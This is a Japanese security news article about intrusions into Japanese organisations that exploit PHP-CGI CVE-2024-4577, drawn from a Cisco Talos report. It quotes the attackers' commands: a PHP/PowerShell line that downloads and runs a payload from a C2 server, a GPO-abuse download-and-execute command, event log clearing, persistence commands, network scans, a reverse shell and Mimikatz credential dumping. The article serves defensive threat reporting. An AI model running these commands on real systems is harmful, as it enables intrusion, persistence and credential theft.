1. セキュリティ対策ラボ
  2. セキュリティニュース
  3. ハッカーがPHPの脆弱性を悪用し、日本を標的にサイバー攻撃を実行(CVE-2024-4577)

ハッカーがPHPの脆弱性を悪用し、日本を標的にサイバー攻撃を実行(CVE-2024-4577)

セキュリティニュース

投稿日時: 更新日時:

ハッカーがPHPの脆弱性を悪用し、日本を標的にサイバー攻撃を実行(CVE-2024-4577)

Cisco Talos調査により、2025年1月以降、日本の企業や組織を狙った未知の攻撃者による悪意のある活動が発見されました。このサイバー攻撃では、Windows上のPHP-CGIにおけるリモートコード実行(RCE)の脆弱性「CVE-2024-4577」を悪用し、被害者のマシンに初期アクセスを確立したことが確認されています。

脆弱性 CVE-2024-4577の概要

2024年6月 9日に公開されたこの脆弱性は、Windows OSにインストールされているすべてのバージョンの PHP に影響を及ぼす CGI 引数インジェクションの脆弱性とされます。

この脆弱性 により、別のセキュリティ上の欠陥CVE-2012-1823に対して導入された保護措置を回避できるようになり、繁体字中国語、簡体字中国語、または日本語のロケールを使用するように構成されている場合、Windows 上のすべての XAMPP インストールがデフォルトで脆弱であるとされます。 CVSS3では9.8と重要な脆弱性とされています。

また、2024年の時点で海外のセキュリティコンサルティング企業「Imperva」が、ランサムウェア攻撃グループ「TellYouThePass」がPHPの脆弱性(CVE-2024-4577)を悪用し、ランサムウェア攻撃を行っている事を指摘しました。

日本のIPAも警告

 IPA では、The PHP Group が提供する PHP の脆弱性 (CVE-2024-4577) を悪用したネットワーク貫通型攻撃による被害を確認し注意喚起しています。実際に国内の複数組織においてこの脆弱性が悪用され、当該 Web サービスに webshell が設置されていたとの指摘があります。 

参照:PHPの脆弱性(CVE-2024-4577)を狙う攻撃について

CVE-2024-4577を用いたサイバー攻撃の概要

このサイバー攻撃はPHP CGIの脆弱性 CVE-2024-4577を狙ったPython 製のスクリプト「PHP-CGI_CVE-2024-4577_RCE.py」を活用し、対象者へ侵害を試みます。

侵害が成功するとPowerShellスクリプトを実行し、Cobalt StrikeリバースHTTPシェルコードを展開し、被害者の端末へリモートアクセスを確保した後に

JuicyPotato、RottenPotato、SweetPotatoなどの権限昇格のエクスプロイトを実行します。

さらに「TaoWu」Cobalt Strike キットを利用し、SYSTEM権限への昇格を試行した後、レジストリの変更、スケジュールされたタスクの追加、悪意のあるWindowsサービスの作成により、被害者のマシンへの継続的なアクセスを確立。

その後、レジストリキーの変更やスケジュールタスクの追加 を行い、「TaoWu」と呼ばれるCobalt Strikeのプラグインを用いて、悪意のあるサービスを作成し、持続的なアクセスを確立 します。

また、攻撃者は ステルス性を維持するために、Windowsのイベントログ(セキュリティ、システム、アプリケーション)を「wevtutil」コマンドで消去 し、痕跡を隠します。

さらに、「fscan.exe」や「Seatbelt.exe」を利用してネットワーク偵察を行い、ラテラルムーブメント(横展開)のターゲットを特定 します。

最終的に、「SharpGPOAbuse.exe」を使用してグループポリシーオブジェクト(GPO)を悪用し、ネットワーク全体で悪意のあるPowerShellスクリプトを実行します。

その後、「Mimikatz」を用いて、標的マシンのメモリ上からパスワードやNTLMハッシュを抽出 し、不正アクセスのための認証情報を盗み取ることで、さらなる攻撃の足掛かりを築きます。

標的となった業種

C2サーバーの解析結果から、攻撃者は日本企業の以下業種を標的にしていることが明らかになりました。

  • テクノロジー
  • 通信
  • エンターテイメント
  • 教育
  • 電子商取引

攻撃手法の詳細

初期アクセス

CVE-2024-4577はは、Windowsの「ベストフィット」機能による文字変換の挙動が原因となり、特定のコマンドライン入力が意図しない形で置き換えられることで発生します。

PHP-CGIモジュールの欠陥により、攻撃者は細工した入力を行うことで、PHPのオプションとして解釈させ、Apache上で動作する脆弱なPHP-CGI環境において、任意のPHPコードを実行 することが可能になります。

攻撃者は、この脆弱性を利用するために、「PHP-CGI_CVE-2024-4577_RCE.py」という公開されているエクスプロイトスクリプトを活用 しています。

このスクリプトは、ターゲットURLがCVE-2024-4577の脆弱性を持つかどうかを判定し、特定のPHPコードを含む細工されたPOSTリクエストを送信します。

レスポンス内に「e10adc3949ba59abbe56e057f20f883e」というMD5ハッシュが含まれている場合、エクスプロイトが成功したと判断されます。

その後、スクリプトは攻撃者が指定したコマンドをPHPコードとして入力し、サーバー上で実行します。

このサイバー攻撃では、PowerShellコマンドを埋め込んだPHPコードを実行し、C2サーバー(38[.]14[.]255[.]23:8000)からPowerShellスクリプトをダウンロードして実行することで、感染を引き起こしている ことが確認されました。

<?php system ('powershell -c "Invoke-Expression (New-Object System.Net.WebClient).DownloadString(\'http[://]38[.]14[.]255[.]23[:]8000/payload[.]ps1\')"');?>

このPowerShellインジェクターは、Cobalt StrikeリバースHTTPシェルコードが埋め込まれたBase64エンコードや16進数のデータBLOBを含み、実行されると被害者のマシンのメモリにシェルコードを挿入し、C2サーバーへ接続 します。

これにより、リモートアクセスが確立され、攻撃者が自由にコマンドを実行できる状態 となります。

また、Cobalt Strikeシェルコードは、ポート8077を使用し、「/6Qeq」や「/jANd」といったURLパスを通じてC2サーバーと通信 するよう設計されています。攻撃者は、以下のようなユーザーエージェントを使用してC2サーバーとの通信をカモフラージュしています。

Mozilla/5.0 (互換; MSIE 9.0; Windows NT 6.1; Trident/5.0; LEN2)
Mozilla/5.0 (互換; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; BOIE9; ENUS)

エクスプロイト後の活動

攻撃者は、Cobalt StrikeのリバースHTTPシェルコードを介してリモートアクセスを確立した後、「TaoWu」と呼ばれるCobalt Strikeキットのプラグインを利用し、さらなるエクスプロイトを実行 します。

この攻撃では、MITRE ATT&CKフレームワークに関連する複数のコマンドが確認されています。

偵察(T1033))

攻撃者はシステム情報やユーザー情報を収集 し、ターゲット環境の把握を試みます。

コマンド例

whoami /all
dir
net time

権限昇格(T1068)

攻撃者は、JuicyPotato、RottenPotato、SweetPotato などの権限昇格エクスプロイトを利用し、標的システム上でユーザー権限をSYSTEM権限へ昇格 させることを試みます。これらの「Potato」系のエクスプロイトは、Windowsの認証プロセスと偽装トークンの処理方法の脆弱性を悪用し、本来よりも高い権限を取得できる手法です。

Microsoftはすでに、Windows 10、Windows Server 2012、2016、2019、最新バージョンのOSにおいて、これらのエクスプロイトが狙う脆弱性を修正 しています。

しかし、「SeImpersonatePrivilege」権限が有効 になっているプロセスでは、依然として他のユーザーのセキュリティトークンを偽装できる ため、JuicyPotato、SweetPotato、RottenPotatoを利用した権限昇格が可能なケースが存在します。

さらに、攻撃者は「TaoWu」Cobalt Strike キットのプラグイン*である Ladon.exe を活用し、被害者のマシンのユーザーアクセス制御(UAC)を回避 します。これにより、攻撃者は管理者権限の取得を容易にし、さらなる攻撃を実行するための足がかりを確保します。

Ladon.exe BypassUac C:\Windows\Temp\123.exe

持続性の確立(T1112,T1053,T1543)

攻撃者は、「TaoWu」Cobalt Strike キットの.NETプラグインを活用し、「reg add」コマンドを用いてレジストリキーを変更 し、Windowsのスケジュールタスクを作成することで、被害者のマシン上で持続的なアクセスを確立します。

具体的には、以下のようなコマンドを実行し、ビーコン実行ファイルのパスをWindowsのRunレジストリキーに追加 します。

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Svchost /t REG_SZ /d "C:\Windows\system32\cmd.exe" /f C:\Windows\Temp\payload.exe

さらに、Windowsのタスクスケジューラを利用し、定期的にマルウェアを実行するよう設定します。

sharpTask.exe --AddTask Computer|local|hostname|ip 24h:time|12:30 \ some Service "Some Service" C:\Windows\Temp\payload.exe

また、攻撃者は「SharpHide.exe」を使用し、レジストリキーを隠蔽することで検出を回避します。

SharpHide.exe action=create keyvalue="C:\Windows\Temp\123.exe"

さらに、「SharpStay.exe」を用いて、Windows上に新たなサービスを作成し、持続性を確保します。

SharpStay.exe action=CreateService servicename=Debug command="C:\Windows\tmp\payload.exe"

検出回避(T1070.001)

攻撃者は、「wevtutil.exe」というWindowsの標準コマンド(LoLBin)を利用し、被害者のマシン上のイベントログを削除 することで、痕跡を隠します。

wevtutil cl security
wevtutil cl system
wevtutil cl application
wevtutil cl windows powershell

横展開(T1570)

攻撃者は、オープンソースのネットワークスキャニングツール「fscan.exe」と、リモートアクセス設定やネットワーク共有情報を収集する「Seatbelt」を使用し、被害者ネットワーク内で偵察活動 を実施します。

C2サーバーからfscan.exeをアップロードし、被害者のマシンに配置。

upload /"C2 server path"/fscan.exe

その後、Seatbelt.exeを実行し、リモートアクセス設定に関する情報を収集。

Seatbelt.exe -group=Remote -full

また、「SharpGPOAbuse.exe」を利用してグループポリシーオブジェクト(GPO)を悪用し、ネットワーク内の複数のマシンでマルウェアのダウンロードと実行を試みます

SharpGPOAbuse.exe --AddComputerTask --TaskName "update" --Author DOMAINAdmin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c "IEX ((new-object new.webclient).downloadstring('http[://]38[.]14[.]255[.]23[:]8000/payload.ps1\'))"" --GPOName "Default Server Policy"

次に、ネットワーク内の他のマシンを探るため、fscan.exeを実行し、256 IPアドレス範囲内のサブネットスキャン を行います。

fscan.exe -h 192[.]168[.]1[.]1/24

さらに、SSHブルートフォース攻撃を試み、SSH対応マシンへの不正アクセスを試行 します。

fscan.exe -h 192[.]168[.]1[.]1/24 -rf id_rsa.pub
fscan.exe -h 192[.]168[.]1[.]1/24 -m ssh -p 2222

最後に、ネットワーク内でリバースシェルを開き、攻撃者のサーバーへ接続しながら、被害者のマシンでコマンドを実行できるようにします。

fscan.exe -h 192[.]168[.]1[.]1/24 -rs 192.168.1.1:6666
fscan.exe -h 192[.]168[.]1[.]1/24 -c whoami

認証情報の窃取および流出(T1003,T1003.001,T1041)

攻撃者は「Mimikatz」を使用し、被害者のマシンのメモリから平文パスワードやNTLMハッシュを抽出 します。

sekurlsa::logonpasswords

攻撃者の手法と既存のハッカーグループとの類似点

今回の攻撃では、脆弱なシステムの脆弱性を悪用して初期アクセスを取得し、Cobalt StrikeのリバースHTTPビーコンを実行 することで、被害者のマシンへのリモートアクセスを持続 させています。また、「TaoWu」Cobalt Strike キットを活用し、sharpTask.exe、SharpHide.exe、SharpStay.exe、Ladon.exe、fscan、Mimikatz などのツールを使用 して、攻撃後の活動を行っています。

この手法は、2024年に「Dark Cloud Shield」または「You Dun」と呼ばれるハッカーグループが使用したものと類似 しており、DFIRレポートでも同様の攻撃が報告 されています。

しかし、今回の攻撃では、被害者のマシンから認証情報を収集した後、それ以上の活動が確認されていない ため、現時点では「You Dun」グループによる攻撃と断定するには至っていません。

 

参照

Unmasking the new persistent attacks on Japan

関連記事

EDRSilencerがエンドポイントセキュリティを回避する手段に悪用EDRSilencerがエンドポイントセキュリティを回避する手段に悪用 Default ThumbnailPHPの脆弱性でWindows サーバーでリモート コードを実行される可能性(CVE-2024-4577) ランサムウェア攻撃グループ「TellYouThePass」がPHPの脆弱性を利用してサイバー攻撃(CVE-2024-4577)ランサムウェア グループ「TellYouThePass」がPHPの脆弱性を利用してサイバー攻撃(CVE-2024-4577) PHPの脆弱性(CVE-2024-4577)を悪用してハッカーがバックドアを仕掛けるPHPの脆弱性(CVE-2024-4577)を悪用してハッカーがバックドアを仕掛ける PHPで複数の脆弱性が修正対象者はアップデートを(CVE-2024-4577,CVE-2024-9026,CVE-2024-8927,CVE-2024-8926,CVE-2024-8925)PHPで複数の脆弱性が修正 対象者はアップデートを(CVE-2024-4577,CVE-2024-9026,CVE-2024-8927,CVE-2024-8926,CVE-2024-8925) 台湾政府の関連する研究機関へ中国のハッカー集団APT41が不正アクセス台湾政府に関連する研究機関へ中国のハッカー集団APT41が不正アクセス トロイの木馬化された「jQuery」がnpmやGitHubで拡散トロイの木馬化された「jQuery」がnpmやGitHubで拡散 VMware ESXiの脆弱性をランサムウェア 攻撃グループが悪用(CVE-2024-37085)VMware ESXiの脆弱性をランサムウェア 攻撃グループが悪用(CVE-2024-37085) ランサムウェア集団がPuTTYとWinSCPのマルバタイジング攻撃でWindows管理者を標的ランサムウェア グループがPuTTYとWinSCPのマルバタイジング攻撃でWindows管理者を標的にしている